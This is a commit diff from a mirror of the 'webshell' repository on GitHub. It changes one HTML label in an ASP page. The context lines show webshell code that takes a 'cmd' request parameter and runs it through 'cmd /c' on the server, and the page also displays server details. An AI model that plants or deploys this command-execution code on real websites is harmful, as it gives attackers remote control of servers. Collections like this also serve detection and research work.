mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
Fixed label
This commit is contained in:
committed by
GitHub
parent
7e6629ab49
commit
acb55c61bb
@@ -39,7 +39,7 @@ end Function
|
|||||||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||||
</p>
|
</p>
|
||||||
<p>
|
<p>
|
||||||
<b>The server's software:</b>
|
<b>The server's local address:</b>
|
||||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||||
<% szCMD = request("cmd")
|
<% szCMD = request("cmd")
|
||||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||||
|
|||||||
Reference in New Issue
Block a user